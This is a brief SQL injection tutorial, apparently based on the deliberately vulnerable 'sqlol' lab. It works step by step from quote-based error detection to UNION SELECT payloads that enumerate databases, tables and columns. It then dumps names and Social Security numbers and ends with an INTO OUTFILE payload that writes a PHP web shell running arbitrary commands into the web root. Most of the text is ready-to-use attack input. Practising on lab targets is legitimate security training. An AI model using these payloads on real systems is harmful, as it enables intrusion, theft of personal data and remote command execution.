Sql Injection: Starting from Basic

Blocking Apostrophe:
Values to Try
Find User or Parameter to inject

    Name	Herp Derper
    #Try to replace prameter with inverted(') or double quote("), Just see where it throws error.

Detect Filtering

    Name	Herp 'Derper
    # trying the name value as Harp 'Derper insted of Herp Derper 
    
Detect Vulnerability

    Once vulnerablity is detected or where system throws error try to equalize the query

Earlier the query was follow:

Select * from user where name='$input';
But we have used an inverted comma in our input so here we get an error because of extra comma, so we need to nutrilize it.

Now our Input becomes
' or '1'='1

    Isadmin      	2-1

Test for 1 Column Returned

    Name	Herp Derper
    Isadmin      	1 UNION SELECT Null #

Test for 2 Columns Returned

    Name	Herp Derper
    Isadmin      	1 UNION SELECT Null, Null #

Find Database Names

    Name	Herp Derper
    Isadmin	1 UNION SELECT Null,table_schema FROM information_schema.tables #

Find Tables in sqlol Database

    Name	Herp Derper
    Isadmin	1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' #

Find Columns within ssn Table

    Name	Herp Derper
    Isadmin	1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' #

Dump Names and SSNs

    Name	Herp Derper
    Isadmin	1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn #

Upload a PHP Shell

    Name	Herp Derper
    Isadmin	1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #